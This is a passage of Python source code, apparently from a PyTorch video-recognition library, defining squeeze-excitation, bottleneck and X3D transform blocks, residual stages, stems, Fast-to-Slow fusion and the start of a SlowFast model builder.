divisor (int): the new width should be dividable by divisor.
"""
super(SE, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
dim_fc = self._round_width(dim_in, ratio)
self.fc1 = nn.Conv3d(dim_in, dim_fc, 1, bias=True)
self.fc1_act = nn.ReLU() if relu_act else Swish()
self.fc2 = nn.Conv3d(dim_fc, dim_in, 1, bias=True)
self.fc2_sig = nn.Sigmoid()
def forward(self, x):
x_in = x
for module in self.children():
x = module(x)
return x_in * x
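# A minimal sketch of the SE block (illustrative; assumes `torch` is imported
# earlier in this file). SE squeezes to _round_width(64, 0.0625) == 8 channels,
# then rescales the input channel-wise, so the output shape equals the input.
def _demo_se():
    se = SE(dim_in=64, ratio=0.0625)
    x = torch.randn(2, 64, 4, 8, 8)
    assert se(x).shape == x.shape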
class BasicTransform(nn.Module):
"""
Basic transformation: Tx3x3, 1x3x3, where T is the size of temporal kernel.
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner=None, num_groups=1, stride_1x1=None, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, block_idx=0):
"""
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the first
convolution in the basic block.
stride (int): the stride of the bottleneck.
dim_inner (None): the inner dimension is not used in
BasicTransform.
num_groups (int): number of groups for the convolution. The number
of groups is always 1 for BasicTransform.
stride_1x1 (None): stride_1x1 will not be used in BasicTransform.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(BasicTransform, self).__init__()
self.temp_kernel_size = temp_kernel_size
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._construct(dim_in, dim_out, stride, norm_module)
def _construct(self, dim_in, dim_out, stride, norm_module):
self.a = nn.Conv3d(dim_in, dim_out, kernel_size=[self.temp_kernel_size, 3, 3], stride=[1, stride, stride], padding=[int(self.temp_kernel_size // 2), 1, 1], bias=False)
self.a_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.a_relu = nn.ReLU(inplace=self._inplace_relu)
self.b = nn.Conv3d(dim_out, dim_out, kernel_size=[1, 3, 3], stride=[1, 1, 1], padding=[0, 1, 1], bias=False)
self.b_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.b_bn.transform_final_bn = True
def forward(self, x):
x = self.a(x)
x = self.a_bn(x)
x = self.a_relu(x)
x = self.b(x)
x = self.b_bn(x)
return x
class X3DTransform(nn.Module):
"""
X3D transformation: 1x1x1, Tx3x3 (channelwise, num_groups=dim_in), 1x1x1,
augmented with (optional) SE (squeeze-excitation) on the 3x3x3 output.
T is the temporal kernel size (defaulting to 3)
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, se_ratio=0.0625, swish_inner=True, block_idx=0):
"""
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the middle
convolution in the bottleneck.
stride (int): the stride of the bottleneck.
dim_inner (int): the inner dimension of the block.
num_groups (int): number of groups for the convolution. num_groups=1
is for standard ResNet like networks, and num_groups>1 is for
ResNeXt like networks.
stride_1x1 (bool): if True, apply stride to 1x1 conv, otherwise
apply stride to the 3x3 conv.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
dilation (int): size of dilation.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
se_ratio (float): if > 0, apply SE to the Tx3x3 conv, with the SE
channel dimensionality being se_ratio times the Tx3x3 conv dim.
swish_inner (bool): if True, apply swish to the Tx3x3 conv, otherwise
apply ReLU to the Tx3x3 conv.
"""
super(X3DTransform, self).__init__()
self.temp_kernel_size = temp_kernel_size
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._se_ratio = se_ratio
self._swish_inner = swish_inner
self._stride_1x1 = stride_1x1
self._block_idx = block_idx
self._construct(dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module)
def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module):
str1x1, str3x3 = (stride, 1) if self._stride_1x1 else (1, stride)
self.a = nn.Conv3d(dim_in, dim_inner, kernel_size=[1, 1, 1], stride=[1, str1x1, str1x1], padding=[0, 0, 0], bias=False)
self.a_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
self.a_relu = nn.ReLU(inplace=self._inplace_relu)
self.b = nn.Conv3d(dim_inner, dim_inner, [self.temp_kernel_size, 3, 3], stride=[1, str3x3, str3x3], padding=[int(self.temp_kernel_size // 2), dilation, dilation], groups=num_groups, bias=False, dilation=[1, dilation, dilation])
self.b_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
use_se = (self._block_idx + 1) % 2 == 1
if self._se_ratio > 0.0 and use_se:
self.se = SE(dim_inner, self._se_ratio)
if self._swish_inner:
self.b_relu = Swish()
else:
self.b_relu = nn.ReLU(inplace=self._inplace_relu)
self.c = nn.Conv3d(dim_inner, dim_out, kernel_size=[1, 1, 1], stride=[1, 1, 1], padding=[0, 0, 0], bias=False)
self.c_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.c_bn.transform_final_bn = True
def forward(self, x):
for block in self.children():
x = block(x)
return x
class BottleneckTransform(nn.Module):
"""
Bottleneck transformation: Tx1x1, 1x3x3, 1x1x1, where T is the size of
temporal kernel.
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, block_idx=0):
"""
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the first
convolution in the bottleneck.
stride (int): the stride of the bottleneck.
dim_inner (int): the inner dimension of the block.
num_groups (int): number of groups for the convolution. num_groups=1
is for standard ResNet like networks, and num_groups>1 is for
ResNeXt like networks.
stride_1x1 (bool): if True, apply stride to 1x1 conv, otherwise
apply stride to the 3x3 conv.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
dilation (int): size of dilation.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(BottleneckTransform, self).__init__()
self.temp_kernel_size = temp_kernel_size
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._stride_1x1 = stride_1x1
self._construct(dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module)
def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module):
str1x1, str3x3 = (stride, 1) if self._stride_1x1 else (1, stride)
self.a = nn.Conv3d(dim_in, dim_inner, kernel_size=[self.temp_kernel_size, 1, 1], stride=[1, str1x1, str1x1], padding=[int(self.temp_kernel_size // 2), 0, 0], bias=False)
self.a_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
self.a_relu = nn.ReLU(inplace=self._inplace_relu)
self.b = nn.Conv3d(dim_inner, dim_inner, [1, 3, 3], stride=[1, str3x3, str3x3], padding=[0, dilation, dilation], groups=num_groups, bias=False, dilation=[1, dilation, dilation])
self.b_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
self.b_relu = nn.ReLU(inplace=self._inplace_relu)
self.c = nn.Conv3d(dim_inner, dim_out, kernel_size=[1, 1, 1], stride=[1, 1, 1], padding=[0, 0, 0], bias=False)
self.c_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.c_bn.transform_final_bn = True
def forward(self, x):
x = self.a(x)
x = self.a_bn(x)
x = self.a_relu(x)
x = self.b(x)
x = self.b_bn(x)
x = self.b_relu(x)
x = self.c(x)
x = self.c_bn(x)
return x
class ResBlock(nn.Module):
"""
Residual block.
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups=1, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, block_idx=0, drop_connect_rate=0.0):
"""
ResBlock class constructs residual blocks. More details can be found in:
Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun.
"Deep residual learning for image recognition."
https://arxiv.org/abs/1512.03385
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the middle
convolution in the bottleneck.
stride (int): the stride of the bottleneck.
trans_func (string): transform function to be used to construct the
bottleneck.
dim_inner (int): the inner dimension of the block.
num_groups (int): number of groups for the convolution. num_groups=1
is for standard ResNet like networks, and num_groups>1 is for
ResNeXt like networks.
stride_1x1 (bool): if True, apply stride to 1x1 conv, otherwise
apply stride to the 3x3 conv.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
dilation (int): size of dilation.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
drop_connect_rate (float): basic rate at which blocks are dropped,
linearly increases from input to output blocks.
"""
super(ResBlock, self).__init__()
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._drop_connect_rate = drop_connect_rate
self._construct(dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups, stride_1x1, inplace_relu, dilation, norm_module, block_idx)
def _construct(self, dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups, stride_1x1, inplace_relu, dilation, norm_module, block_idx):
if dim_in != dim_out or stride != 1:
self.branch1 = nn.Conv3d(dim_in, dim_out, kernel_size=1, stride=[1, stride, stride], padding=0, bias=False, dilation=1)
self.branch1_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.branch2 = trans_func(dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=stride_1x1, inplace_relu=inplace_relu, dilation=dilation, norm_module=norm_module, block_idx=block_idx)
self.relu = nn.ReLU(self._inplace_relu)
def _drop_connect(self, x, drop_ratio):
"""Apply dropconnect to x"""
keep_ratio = 1.0 - drop_ratio
mask = torch.empty([x.shape[0], 1, 1, 1, 1], dtype=x.dtype, device=x.device)
mask.bernoulli_(keep_ratio)
x.div_(keep_ratio)
x.mul_(mask)
return x
def forward(self, x):
f_x = self.branch2(x)
if self.training and self._drop_connect_rate > 0.0:
f_x = self._drop_connect(f_x, self._drop_connect_rate)
if hasattr(self, 'branch1'):
x = self.branch1_bn(self.branch1(x)) + f_x
else:
x = x + f_x
x = self.relu(x)
return x
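# A minimal sketch of a residual block with a projection shortcut (illustrative;
# assumes `torch` is imported earlier in this file). Since dim_in != dim_out and
# stride != 1, branch1 (a strided 1x1x1 conv) is created to match the branch2
# output before the two are summed.
def _demo_res_block():
    block = ResBlock(64, 128, 3, 2, BottleneckTransform, 32)
    x = torch.randn(2, 64, 8, 32, 32)
    assert block(x).shape == (2, 128, 8, 16, 16)  # spatial stride 2, channels projected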
def get_trans_func(name):
"""
Retrieves the transformation module by name.
"""
trans_funcs = {'bottleneck_transform': BottleneckTransform, 'basic_transform': BasicTransform, 'x3d_transform': X3DTransform}
assert name in trans_funcs.keys(), "Transformation function '{}' not supported".format(name)
return trans_funcs[name]
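# A minimal sketch of looking up a transform by name (illustrative; assumes
# `torch` is imported earlier in this file). The returned class is instantiated
# like any of the transform modules defined above.
def _demo_trans_func():
    trans = get_trans_func('bottleneck_transform')
    block = trans(dim_in=64, dim_out=256, temp_kernel_size=3, stride=1, dim_inner=64, num_groups=1)
    x = torch.randn(2, 64, 8, 16, 16)
    assert block(x).shape == (2, 256, 8, 16, 16)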
class ResStage(nn.Module):
"""
Stage of 3D ResNet. It expects to have one or more tensors as input for
single pathway (C2D, I3D, Slow), and multi-pathway (SlowFast) cases.
More details can be found here:
Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
"SlowFast networks for video recognition."
https://arxiv.org/pdf/1812.03982.pdf
"""
def __init__(self, dim_in, dim_out, stride, temp_kernel_sizes, num_blocks, dim_inner, num_groups, num_block_temp_kernel, nonlocal_inds, nonlocal_group, nonlocal_pool, dilation, instantiation='softmax', trans_func_name='bottleneck_transform', stride_1x1=False, inplace_relu=True, norm_module=nn.BatchNorm3d, drop_connect_rate=0.0):
"""
The `__init__` method of any subclass should also contain these arguments.
ResStage builds p streams, where p can be greater than or equal to one.
Args:
dim_in (list): list of p the channel dimensions of the input.
Different channel dimensions control the input dimension of
different pathways.
dim_out (list): list of p the channel dimensions of the output.
Different channel dimensions control the input dimension of
different pathways.
temp_kernel_sizes (list): list of the p temporal kernel sizes of the
convolution in the bottleneck. Different temp_kernel_sizes
control different pathway.
stride (list): list of the p strides of the bottleneck. Different
stride control different pathway.
num_blocks (list): list of p numbers of blocks for each of the
pathway.
dim_inner (list): list of the p inner channel dimensions of the
input. Different channel dimensions control the input dimension
of different pathways.
num_groups (list): list of number of p groups for the convolution.
num_groups=1 is for standard ResNet like networks, and
num_groups>1 is for ResNeXt like networks.
num_block_temp_kernel (list): extend the temp_kernel_sizes to
num_block_temp_kernel blocks, then fill temporal kernel size
of 1 for the rest of the layers.
nonlocal_inds (list): If the tuple is empty, no nonlocal layer will
be added. If the tuple is not empty, add nonlocal layers after
the index-th block.
dilation (list): size of dilation for each pathway.
nonlocal_group (list): list of number of p nonlocal groups. Each
number controls how to fold temporal dimension to batch
dimension before applying nonlocal transformation.
https://github.com/facebookresearch/video-nonlocal-net.
instantiation (string): different instantiation for nonlocal layer.
Supports two different instantiation method:
"dot_product": normalizing correlation matrix with L2.
"softmax": normalizing correlation matrix with Softmax.
trans_func_name (string): name of the transformation function to apply
on the network.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
drop_connect_rate (float): basic rate at which blocks are dropped,
linearly increases from input to output blocks.
"""
super(ResStage, self).__init__()
assert all(num_block_temp_kernel[i] <= num_blocks[i] for i in range(len(temp_kernel_sizes)))
self.num_blocks = num_blocks
self.nonlocal_group = nonlocal_group
self._drop_connect_rate = drop_connect_rate
self.temp_kernel_sizes = [((temp_kernel_sizes[i] * num_blocks[i])[:num_block_temp_kernel[i]] + [1] * (num_blocks[i] - num_block_temp_kernel[i])) for i in range(len(temp_kernel_sizes))]
assert len({len(dim_in), len(dim_out), len(temp_kernel_sizes), len(stride), len(num_blocks), len(dim_inner), len(num_groups), len(num_block_temp_kernel), len(nonlocal_inds), len(nonlocal_group)}) == 1
self.num_pathways = len(self.num_blocks)
self._construct(dim_in, dim_out, stride, dim_inner, num_groups, trans_func_name, stride_1x1, inplace_relu, nonlocal_inds, nonlocal_pool, instantiation, dilation, norm_module)
def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, trans_func_name, stride_1x1, inplace_relu, nonlocal_inds, nonlocal_pool, instantiation, dilation, norm_module):
for pathway in range(self.num_pathways):
for i in range(self.num_blocks[pathway]):
trans_func = get_trans_func(trans_func_name)
res_block = ResBlock(dim_in[pathway] if i == 0 else dim_out[pathway], dim_out[pathway], self.temp_kernel_sizes[pathway][i], stride[pathway] if i == 0 else 1, trans_func, dim_inner[pathway], num_groups[pathway], stride_1x1=stride_1x1, inplace_relu=inplace_relu, dilation=dilation[pathway], norm_module=norm_module, block_idx=i, drop_connect_rate=self._drop_connect_rate)
self.add_module('pathway{}_res{}'.format(pathway, i), res_block)
if i in nonlocal_inds[pathway]:
nln = Nonlocal(dim_out[pathway], dim_out[pathway] // 2, nonlocal_pool[pathway], instantiation=instantiation, norm_module=norm_module)
self.add_module('pathway{}_nonlocal{}'.format(pathway, i), nln)
def forward(self, inputs):
output = []
for pathway in range(self.num_pathways):
x = inputs[pathway]
for i in range(self.num_blocks[pathway]):
m = getattr(self, 'pathway{}_res{}'.format(pathway, i))
x = m(x)
if hasattr(self, 'pathway{}_nonlocal{}'.format(pathway, i)):
nln = getattr(self, 'pathway{}_nonlocal{}'.format(pathway, i))
b, c, t, h, w = x.shape
if self.nonlocal_group[pathway] > 1:
x = x.permute(0, 2, 1, 3, 4)
x = x.reshape(b * self.nonlocal_group[pathway], t // self.nonlocal_group[pathway], c, h, w)
x = x.permute(0, 2, 1, 3, 4)
x = nln(x)
if self.nonlocal_group[pathway] > 1:
x = x.permute(0, 2, 1, 3, 4)
x = x.reshape(b, t, c, h, w)
x = x.permute(0, 2, 1, 3, 4)
output.append(x)
return output
class ResNetBasicStem(nn.Module):
"""
ResNe(X)t 3D stem module.
Performs spatiotemporal Convolution, BN, and Relu, followed by a
spatiotemporal pooling.
"""
def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d):
"""
The `__init__` method of any subclass should also contain these arguments.
Args:
dim_in (int): the channel dimension of the input. Normally 3 is used
for rgb input, and 2 or 3 is used for optical flow input.
dim_out (int): the output dimension of the convolution in the stem
layer.
kernel (list): the kernel size of the convolution in the stem layer.
temporal kernel size, height kernel size, width kernel size in
order.
stride (list): the stride sizes of the convolution in the stem layer.
temporal stride, height stride, width stride in
order.
padding (list): the padding sizes of the convolution in the stem
layer, temporal padding size, height padding size, width
padding size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(ResNetBasicStem, self).__init__()
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
self._construct_stem(dim_in, dim_out, norm_module)
def _construct_stem(self, dim_in, dim_out, norm_module):
self.conv = nn.Conv3d(dim_in, dim_out, self.kernel, stride=self.stride, padding=self.padding, bias=False)
self.bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
self.relu = nn.ReLU(self.inplace_relu)
self.pool_layer = nn.MaxPool3d(kernel_size=[1, 3, 3], stride=[1, 2, 2], padding=[0, 1, 1])
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
x = self.pool_layer(x)
return x
class X3DStem(nn.Module):
"""
X3D's 3D stem module.
Performs a spatial convolution followed by a depthwise temporal
convolution, then BN and ReLU.
"""
def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d):
"""
The `__init__` method of any subclass should also contain these arguments.
Args:
dim_in (int): the channel dimension of the input. Normally 3 is used
for rgb input, and 2 or 3 is used for optical flow input.
dim_out (int): the output dimension of the convolution in the stem
layer.
kernel (list): the kernel size of the convolution in the stem layer.
temporal kernel size, height kernel size, width kernel size in
order.
stride (list): the stride sizes of the convolution in the stem layer.
temporal stride, height stride, width stride in
order.
padding (list): the padding sizes of the convolution in the stem
layer, temporal padding size, height padding size, width
padding size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(X3DStem, self).__init__()
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
self._construct_stem(dim_in, dim_out, norm_module)
def _construct_stem(self, dim_in, dim_out, norm_module):
self.conv_xy = nn.Conv3d(dim_in, dim_out, kernel_size=(1, self.kernel[1], self.kernel[2]), stride=(1, self.stride[1], self.stride[2]), padding=(0, self.padding[1], self.padding[2]), bias=False)
self.conv = nn.Conv3d(dim_out, dim_out, kernel_size=(self.kernel[0], 1, 1), stride=(self.stride[0], 1, 1), padding=(self.padding[0], 0, 0), bias=False, groups=dim_out)
self.bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
self.relu = nn.ReLU(self.inplace_relu)
def forward(self, x):
x = self.conv_xy(x)
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
def get_stem_func(name):
"""
Retrieves the stem module by name.
"""
trans_funcs = {'x3d_stem': X3DStem, 'basic_stem': ResNetBasicStem}
assert name in trans_funcs.keys(), "Transformation function '{}' not supported".format(name)
return trans_funcs[name]
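# A minimal sketch of looking up a stem by name (illustrative; assumes `torch`
# is imported earlier in this file). The X3D stem downsamples 2x spatially and
# keeps the temporal length.
def _demo_stem_func():
    stem = get_stem_func('x3d_stem')(3, 24, [5, 3, 3], [1, 2, 2], [2, 1, 1])
    frames = torch.randn(1, 3, 13, 160, 160)
    assert stem(frames).shape == (1, 24, 13, 80, 80)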
class VideoModelStem(nn.Module):
"""
Video 3D stem module. Provides stem operations of Conv, BN, ReLU, MaxPool
on input data tensor for one or multiple pathways.
"""
def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, stem_func_name='basic_stem'):
"""
The `__init__` method of any subclass should also contain these
arguments. List size of 1 for single pathway models (C2D, I3D, Slow
etc.), list size of 2 for two pathway models (SlowFast).
Args:
dim_in (list): the list of channel dimensions of the inputs.
dim_out (list): the output dimension of the convolution in the stem
layer.
kernel (list): the kernels' size of the convolutions in the stem
layers. Temporal kernel size, height kernel size, width kernel
size in order.
stride (list): the stride sizes of the convolutions in the stem
layer. Temporal stride, height stride, width stride in
order.
padding (list): the paddings' sizes of the convolutions in the stem
layer. Temporal padding size, height padding size, width padding
size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
stem_func_name (string): name of the stem function applied on
input to the network.
"""
super(VideoModelStem, self).__init__()
assert len({len(dim_in), len(dim_out), len(kernel), len(stride), len(padding)}) == 1, 'Input pathway dimensions are not consistent.'
self.num_pathways = len(dim_in)
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
self._construct_stem(dim_in, dim_out, norm_module, stem_func_name)
def _construct_stem(self, dim_in, dim_out, norm_module, stem_func_name):
trans_func = get_stem_func(stem_func_name)
for pathway in range(len(dim_in)):
stem = trans_func(dim_in[pathway], dim_out[pathway], self.kernel[pathway], self.stride[pathway], self.padding[pathway], self.inplace_relu, self.eps, self.bn_mmt, norm_module)
self.add_module('pathway{}_stem'.format(pathway), stem)
def forward(self, x):
assert len(x) == self.num_pathways, 'Input tensor does not contain {} pathways'.format(self.num_pathways)
for pathway in range(len(x)):
m = getattr(self, 'pathway{}_stem'.format(pathway))
x[pathway] = m(x[pathway])
return x
class FuseFastToSlow(nn.Module):
"""
Fuses the information from the Fast pathway to the Slow pathway. Given the
tensors from Slow pathway and Fast pathway, fuse information from Fast to
Slow, then return the fused tensors from Slow and Fast pathway in order.
"""
def __init__(self, dim_in, fusion_conv_channel_ratio, fusion_kernel, alpha, eps=1e-05, bn_mmt=0.1, inplace_relu=True, norm_module=nn.BatchNorm3d):
"""
Args:
dim_in (int): the channel dimension of the input.
fusion_conv_channel_ratio (int): channel ratio for the convolution
used to fuse from Fast pathway to Slow pathway.
fusion_kernel (int): kernel size of the convolution used to fuse
from Fast pathway to Slow pathway.
alpha (int): the frame rate ratio between the Fast and Slow pathway.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(FuseFastToSlow, self).__init__()
self.conv_f2s = nn.Conv3d(dim_in, dim_in * fusion_conv_channel_ratio, kernel_size=[fusion_kernel, 1, 1], stride=[alpha, 1, 1], padding=[fusion_kernel // 2, 0, 0], bias=False)
self.bn = norm_module(num_features=dim_in * fusion_conv_channel_ratio, eps=eps, momentum=bn_mmt)
self.relu = nn.ReLU(inplace_relu)
def forward(self, x):
x_s = x[0]
x_f = x[1]
fuse = self.conv_f2s(x_f)
fuse = self.bn(fuse)
fuse = self.relu(fuse)
x_s_fuse = torch.cat([x_s, fuse], 1)
return [x_s_fuse, x_f]
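# A minimal sketch of the Fast-to-Slow fusion (illustrative; assumes `torch` is
# imported earlier in this file). With alpha=4 the strided conv aligns the Fast
# temporal length to the Slow pathway before channel concatenation.
def _demo_fuse_fast_to_slow():
    fuse = FuseFastToSlow(dim_in=8, fusion_conv_channel_ratio=2, fusion_kernel=5, alpha=4)
    slow = torch.randn(1, 64, 4, 14, 14)
    fast = torch.randn(1, 8, 16, 14, 14)
    out = fuse([slow, fast])
    assert out[0].shape == (1, 64 + 8 * 2, 4, 14, 14)  # Slow gains ratio * Fast channels
    assert out[1].shape == fast.shape                  # Fast passes through unchanged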
_MODEL_STAGE_DEPTH = {50: (3, 4, 6, 3), 101: (3, 4, 23, 3)}
_POOL1 = {'c2d': [[2, 1, 1]], 'c2d_nopool': [[1, 1, 1]], 'i3d': [[2, 1, 1]], 'i3d_nopool': [[1, 1, 1]], 'slow': [[1, 1, 1]], 'slowfast': [[1, 1, 1], [1, 1, 1]], 'x3d': [[1, 1, 1]]}
_TEMPORAL_KERNEL_BASIS = {'c2d': [[[1]], [[1]], [[1]], [[1]], [[1]]], 'c2d_nopool': [[[1]], [[1]], [[1]], [[1]], [[1]]], 'i3d': [[[5]], [[3]], [[3, 1]], [[3, 1]], [[1, 3]]], 'i3d_nopool': [[[5]], [[3]], [[3, 1]], [[3, 1]], [[1, 3]]], 'slow': [[[1]], [[1]], [[1]], [[3]], [[3]]], 'slowfast': [[[1], [5]], [[1], [3]], [[1], [3]], [[3], [3]], [[3], [3]]], 'x3d': [[[5]], [[3]], [[3]], [[3]], [[3]]]}
def get_norm(cfg):
"""
Args:
cfg (CfgNode): model building configs, details are in the comments of
the config file.
Returns:
nn.Module: the normalization layer.
"""
if cfg.BN.NORM_TYPE == 'batchnorm':
return nn.BatchNorm3d
elif cfg.BN.NORM_TYPE == 'sub_batchnorm':
return partial(SubBatchNorm3d, num_splits=cfg.BN.NUM_SPLITS)
elif cfg.BN.NORM_TYPE == 'sync_batchnorm':
return partial(NaiveSyncBatchNorm3d, num_sync_devices=cfg.BN.NUM_SYNC_DEVICES)
else:
raise NotImplementedError('Norm type {} is not supported'.format(cfg.BN.NORM_TYPE))
class SlowFast(nn.Module):
"""
SlowFast model builder for SlowFast network.
Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
"SlowFast networks for video recognition."
https://arxiv.org/pdf/1812.03982.pdf
"""
def __init__(self, cfg):
"""
The `__init__` method of any subclass should also contain these
arguments.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
super(SlowFast, self).__init__()
self.norm_module = get_norm(cfg)
self.enable_detection = cfg.DETECTION.ENABLE
self.num_pathways = 2
self._construct_network(cfg)
init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)
def _construct_network(self, cfg):
"""
Builds a SlowFast model. The first pathway is the Slow pathway and the
second pathway is the Fast pathway.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
assert cfg.MODEL.ARCH in _POOL1.keys()
pool_size = _POOL1[cfg.MODEL.ARCH]
assert len({len(pool_size), self.num_pathways}) == 1
assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
num_groups = cfg.RESNET.NUM_GROUPS
width_per_group = cfg.RESNET.WIDTH_PER_GROUP
dim_inner = num_groups * width_per_group
out_dim_ratio = cfg.SLOWFAST.BETA_INV // cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO
temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[width_per_group, width_per_group // cfg.SLOWFAST.BETA_INV], kernel=[temp_kernel[0][0] + [7, 7], temp_kernel[0][1] + [7, 7]], stride=[[1, 2, 2]] * 2, padding=[[temp_kernel[0][0][0] // 2, 3, 3], [temp_kernel[0][1][0] // 2, 3, 3]], norm_module=self.norm_module)
self.s1_fuse = FuseFastToSlow(width_per_group // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
